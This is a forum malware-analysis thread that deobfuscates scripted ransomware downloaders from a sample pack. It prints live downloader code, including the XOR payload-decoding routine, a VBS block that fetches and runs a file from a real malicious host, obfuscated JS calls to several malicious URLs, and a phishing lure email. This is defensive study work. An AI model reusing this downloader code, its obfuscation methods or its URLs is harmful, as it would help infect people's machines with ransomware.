Malware Analysis Downloaders - Scripted samples from Malware Vault - 1-8-16 13#

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
https://malwaretips.com/threads/1-8-16-13.61883/
(Thanks to @Solarquest (https://malwaretips.com/members/solarquest.25489/) for the "cookies" :) )

I've seen that there are, inside the zipped archive, several scripted downloaders with some obfuscation methods (.vbs, .js, .wsf)

I will use this thread to analyse them, and show what they look like once deobfuscated (or not :p )


(1) The .wsf files

11 annual report -ACAE1246-.wsf
13 annual report -EDAB2336-.wsf
10 07e81be27f.wsf
9 PV1.wsf

I add from same sub-wave : a file I received as a target, yesterday :
annual report -DFC52512-.wsf
"Dear DardiM,

Please review the attached corrected annual report.


Yours faithfully
Isabel Sutton"

=> reported, this is the result : https://www.hybrid-analysis.com/sam...f309f2add84d337c11ca00c25b0?environmentId=100

These samples are downloaders similar to the one I analysed here, once deobfuscated:
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/

So I won't describe the deobfuscated parts again, just talk about some funny parts :)

- No need to deobfuscate them (very bad obfuscation method used, see below): with a simple "notepad edit" we can already see some parts that I described in my previous post (from the fresh sample received in the last wave, July 28):

- Some important clues appear clearly in the "obfuscated file", with a simple "find" (it made me laugh :) ):
=> var random :rolleyes:
=> rawprng()
=> var mash = Mash();
=> function uheprng()

- important parts that are not very obfuscated:
=> QVh1 /* c\040 */(25\066); => QVh1(256) => used for the XOR
=> arrays of chars used for the de-cipher parts (char replacement)

Do you remember those names? I hope so, else go and see the analysis linked above :p

To summarize:
- This family of scripted downloaders downloads, to a path, an obfuscated payload that is not seen as an executable file.
- The same scripted downloader is also used to decipher/deobfuscate the content of the downloaded payload so that it becomes a real executable, a ransomware with .exe extension.
- Then the scripted downloader runs the payload with a parameter.

The values/names seen above in red are from the new version of this family of downloader, which uses a more complicated technique to obtain the value used for the XOR between each content char of the future .exe file and a value returned by the QVh1(256) function. The result takes the place of the old content char used for the XOR.

var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= QVh1(256); // XOR
// file_content_temp[index] = file_content_temp[index]^ QVh1(256);
}

QVh1 = uheprng() => content of var random
=> calls the sub-function: var mash = Mash(); mash(value), etc.
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
=> these names should have been obfuscated by the first obfuscation method, because they are real clues to detect the malware easily
function uheprng() {
return (function() {
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 1 * 0; i < o; i++) s[i] = mash(384267); // the "[i]" was eaten by the forum's BBCode rendering
mash = null;

var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
if (++p >= o) p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;


}());
};

function Mash() {

var n = 0xefc8249d;
var mash = function(data) {
if (data) {

data = data.toString();
for (var i = -8257 + 8257; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else
n = 0xefc8249d;
};
return mash;
}

Trojan-Downloader.JS.Agent.lxw

Clearly similar to :

Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80

But with an awful first obfuscation method => very easy to detect by heuristic analysis
(because they let some important strings appear in a simple text editor :confused:)


Obfuscation method used first:

<job id="a">
<script language="JScript" id="a">
if (WScript.Path.charAt(WScript.Path.length-1) != "2") WScript.Quit(0);
var aDb7 = 'var\040SNg\065 \075 "ose" +\040"";\r\nvar \122d0 = "cl" +\040"";\r\nvar XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";\r\nvar\040LUg \075 "ext" + "";\r\nvar FSi \075 "iteT" + \042";\r\nv\141r Iq2 \075\040"\167r" +\040"";\r\012var MCl\060\040= "\157p\145n" \053 "";\r\nvar COz = "t" + "";\r\nvar So2 = "rs\145" + "";\r\012var Bk = "C\150a" + ""\073\r\012var\040Pn0\040= "pe" + "";\r\nva\162\040L\154\040= "\164y" + "";\r\n\166ar Yo6\040=\040"m\042 \053 ""\073\r\012var AK\164 = "ea\042 +\040"\042;\r\nvar Fr0 = "tr" + "";\r\n\166ar NYf\065 = \042DB.S" + "";\r\nvar ISh9 = \042O" \053\040"";\r\nv\141r UFg =\040"D" + \042"\073\r\nva\162 YBj = "A" + "";\015\012\166ar \110j\061 = "ect"\040+ "";\r\nvar Ak1 = "eObj\042\040+\040"";\r\nvar\040Qh6 = "eat" + "";\r\nvar Rp9 = \042C\162" + ""\073\r\012functi\157n \124V\145(EIq0)\173re\164urn EIq0;};var N\122\157 = "in" +\040""\073\r\nv\141r Qr9\040= "jo" \053 "";\r\012var YKt = "C\157de\042 + "";\r\nvar Mj9\040= "har" + "\042\073\r\012var QRt = "\146romC" + ""\073\r\nvar Fo9 =\040"h\042 + \042"\073\r\nvar NSj = "l\145n\147t" + "";\r\nvar \132K\161 = \042h" + "";\015\nvar Vy = "pus" + "";\015\nvar \112Rx9 = "t" + "";\r\nvar \115p = "od\145A" + "\042;\r\nvar Ip = "c\150a\162C" + "";\r\nvar\040QRw =\040"h" + \042";\015\012\166a\162 Ul =\040\042\154engt" + "";\015\nvar Vj0\040= "close"
....
....
KJp\133TWg0]();\r\012};';
eval(aDb7.replace('@', 'v'));
WScript.Quit(1);
</script>
</job>

- unescape unicode

=> some chars are replaced by \unicode escapes

An example :

var XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";

=> Unicode Escaping Tools - Online Toolz

copy-paste into the part:

Converts Unicode Entities to Unicode Text
Unicode Entities

click on convert
result:

var XIu6 = "le" + "";
var Ec = "oFi" + "";
var Ui = "SaveT" + "";


You can't use the tool linked above to decode the whole file, because some other chars will make it fail :)
But this can give you an idea of the "poor" method used

Obfuscation method used after:

- string replacement by var concatenations and function calls

(2) 2.8.vbs

Dim gqawtaci
Dim lelruwu7, vlopazo9, dasgilcur9, kiwilve, rocu2, gquhynk4, rmahbezc, ibefo, ijlagle, karyccoq, tefcy2
Dim wyfpi2, ofebw9, qhopkuqfa, imonqy2, aqiv4, iphewb, bubhumug8, zapjym, fifgimtud7
Dim nisyc
Dim avduwra
Dim cuwosamv, znawmuji0, hsinugzy6, gizwul1, uniku, nkemyfog3, efhawu, lexxanwy1
kiwilve = Array ("asn", "ze", "Sc", "ufluv", "uhd", "lwyzl")(2)
ibefo = "WS"
function yqegnokve ()
...
...
End function
vlopazo9 = "el"
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
function nwaqzupe ()
Dim ecowsupo
ecowsupo = "Sy"
nwaqzupe = ecowsupo
End function
function exjat ()
Dim cihojy
cihojy = Array ("LH", "npib", "ipo", "facl", "ese", "xu")(0)
exjat = cihojy
End function
function ymqunygf ()
Dim ixuje
ixuje = "ri"
ymqunygf = ixuje
End function
function vaxivwu ()
Dim yjytt
yjytt = Array ("oje", "hu", "kdeja", "uri", "ip", "efva")(4)
...
lelruwu7 = "Ob"
znawmuji0 = "ex"
efhawu = Array ("Fi", "upe", "dare", "invu", "meff", "uzujq", "uqky", "pa")(0)
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
dasgilcur9 = "b."
tefcy2 = "/c"
function kqufiwbe ()
Dim htywcix
htywcix = Array ("yvah", "oci", "bci", "hxy", "psoqpo", "cbicy", " ", "lyqx")(6)
kqufiwbe = htywcix
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ocgusix ()
Dim zfevydu
zfevydu = "of"
ocgusix = zfevydu
End function
nkemyfog3 = Array ("fxofu", "so", "cr", "ly", "gdi", "uwe", "hri")(2)
cuwosamv = "ng"
lexxanwy1 = Array ("usit", "ujpaz", "kmaz", "aqus", "em", "xax", "no")(4)
karyccoq = "in"
function ugqufqor ()
Dim ecbabruri
ecbabruri = "l"
ugqufqor = ecbabruri
End function
...
...
End function
ijlagle = Array ("vgev", "yriv", "hsexvy", "izto", "wbokm", "ywuvz", "le")(6)
function alwub ()
Dim ciherw
ciherw = Array ("ur", "hxymmo", "dwadm", "udg", "iqber", "oxa", "e ")(6)
alwub = ciherw
End function
function edunahi ()
Dim oxtivvy
oxtivvy = Array ("cwe", "gworne", "Mi", "zuf", "ucik", "ygduv", "itx", "ydp")(2)
edunahi = oxtivvy
End function
function fboxpopku ()
Dim pxapzo
pxapzo = "st"
fboxpopku = pxapzo
End function
function inut ()
Dim xysote
xysote = Array ("je", "tvyth", "uxu", "atu", "osbefh", "bo")(0)
inut = xysote
End function
wyfpi2 = Array ("oba", "t.", "debu", "xwo", "txafy", "icv")(1)
function ypirysy ()
Dim mankiga
mankiga = Array ("wi", "orqu", "op", "P", "yxf", "okovs", "otse")(3)
ypirysy = mankiga
End function
...
....
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "http://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla

Obfuscation method used:

Only replacement/concatenation of strings from vars or functions (an example below)

The funniest part: at the end of the file, this part:

...
...
function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla


First conclusion:
=> important parts are not very well obfuscated .... :rolleyes:
=> we can see the URL used for the payload o_O

Without trying to deobfuscate it, it's easy to understand almost everything:

(Better obfuscation, but an analogous result was seen in a previous analysis:
https://malwaretips.com/threads/1-vbs-sample-downloader-vbswgbased-gen-deobfuscation.61734/
=> spoiler in part (4)
)

- It creates a temp file name and makes the path :
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo

(adsyqgu = 2: the Temp folder is used to store temporary files. Its path is found in the TMP environment variable)

- opens a connection and sends the request:
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
(uniku = "GET")

- creates an object and opens a stream to save the received content:
Set pwodesen5 = CreateObject(rocu2)
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
("ADODB.Stream" object => see below)

- and uses the same object to save it to a file :
pwodesen5.savetofile pelisak, adsyqgu

- at the end, it runs the payload :
ysezhuxwa unjijbagwe2, pelisak, ozylefla
(function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if)


Easy to understand what this script does...
I deobfuscated 0 parts to write the part above ...

(In green, information I retrieved afterwards, to be clearer)

An example of a string obtained by several methods:

Set pwodesen5 = CreateObject(rocu2)

rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu

with :

rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
// I have rarely seen a method as easy => Array(......)(index_to_use_in_clear)

bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "b."

function zucebi ()

Dim efjipxu
efjipxu = "St"
zucebi = efjipxu
End function

function cdanufv ()

Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function

function ibebacu ()

Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function

=> red strings => rocu2 = "adodb.stream"
=> Set pwodesen5 = CreateObject("adodb.stream")
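As an added example (not code from the post, and not the sample's own code), here is a small Python resolver for the two idioms this VBS downloader relies on: the `Array("a", "b", ...)(index)` pick and the `a & b & c` concatenation of vars and single-return functions. It is fed the `rocu2` pieces quoted above, embedded inline so it runs offline; the function and regex names are mine. Resolving the pieces statically, without running the script, gives the same "ADODB.Stream" the post finds by reading:

```python
import re

# Constructed excerpt: the pieces of the 'rocu2' chain quoted in the post,
# embedded inline so the resolver runs offline (no sample file needed).
VBS_EXCERPT = '''
rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "b."
function zucebi ()
Dim efjipxu
efjipxu = "St"
zucebi = efjipxu
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
'''

ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.*?)\s*$')
ARRAY_RE = re.compile(r'Array\s*\((.*?)\)\s*\((\d+)\)')
# One token per string literal, Array(...)(n) pick, or identifier.
# The '&' concatenation operator matches nothing and is simply skipped.
TOKEN_RE = re.compile(r'"[^"]*"|Array\s*\(.*?\)\s*\(\d+\)|\w+')
SKIP_WORDS = {"dim", "function", "end", "set", "if"}


def collect_assignments(source):
    """Flat map name -> right-hand side text.

    A flat map is enough here because each helper function returns by
    assigning to its own name and every local variable name is unique.
    """
    env = {}
    for line in source.splitlines():
        words = line.split()
        if not words or words[0].lower() in SKIP_WORDS:
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = m.group(2)
    return env


def eval_expr(expr, env, depth=0):
    """Evaluate literals, Array(...)(n) picks and references, recursively."""
    if depth > 50:
        raise ValueError("reference chain too deep (cycle?)")
    out = []
    for tok in TOKEN_RE.findall(expr):
        if tok.startswith('"'):
            out.append(tok[1:-1])
        elif tok.startswith("Array"):
            m = ARRAY_RE.match(tok)
            items = re.findall(r'"([^"]*)"', m.group(1))
            out.append(items[int(m.group(2))])
        else:
            out.append(eval_expr(env[tok], env, depth + 1))
    return "".join(out)


def resolve(name, source=VBS_EXCERPT):
    """Resolve one variable of the excerpt to its final string value."""
    env = collect_assignments(source)
    return eval_expr(env[name], env)


if __name__ == "__main__":
    print("rocu2 =", resolve("rocu2"))
```

The same resolver works for the other `CreateObject(...)` arguments of this sample once their pieces are pasted into the excerpt; anything that resolves to a scripting host object name, a stream class or a shell runner is what a heuristic should be looking at.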

I stop here for the very easy obfuscation methods.
The next part will be about a sample that uses a more elaborate obfuscation method, from the same Malware Vault pack.

(3) "4 6183943701_01-08-2016.js" ( same method as "7 9329606101_01-08-2016.wsf") :

When first opening this file in an editor, the obfuscation method looks interesting.
In the spoiler, only a few parts, to give you an idea:
votgorodazaspinoyiputkoroheCCCrodmands.create = function(){
var votgorodazaspinoyiputkoroheCCCpublisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();
var votgorodazaspinoyiputkoroheCCCspyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(), "Function called without arguments");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, "PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith("PROPER1"), "Function called with 'PROPER1' argument");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, ["PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCparam1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;
function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){
if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}
else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};
var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};

var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);

...
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());

...
votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 
1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...

try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4(
"http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

Deobfuscation :

1)

First thing to do : delete all "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts :

rodmands.create = function(){
var publisher = new MBJSL.Publisher();
var spyFunction1 = sinon.spy();
publisher.subscribe(spyFunction1, this.type1);
publisher.publish(this.type1);
ok(spyFunction1.calledWith(), "Function called without arguments");
publisher.publish(this.type1, "PROPER1");
ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
rodmands.subtract = function(param1, param2) {
return new rodmands(param1.x - param2.x, param1.y - param2.y);
};
var qtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var errant = 0;
function achievment(bidttt){
if(bidttt==1){return 2;}
else{return 17;}
return 3;};
function center(rivulet) {
request = rivulet;
for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq[i]);} // "[i]" restored: the forum rendered it as an italic tag
return request;
};
var chosen = 33/3-10;
function rodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
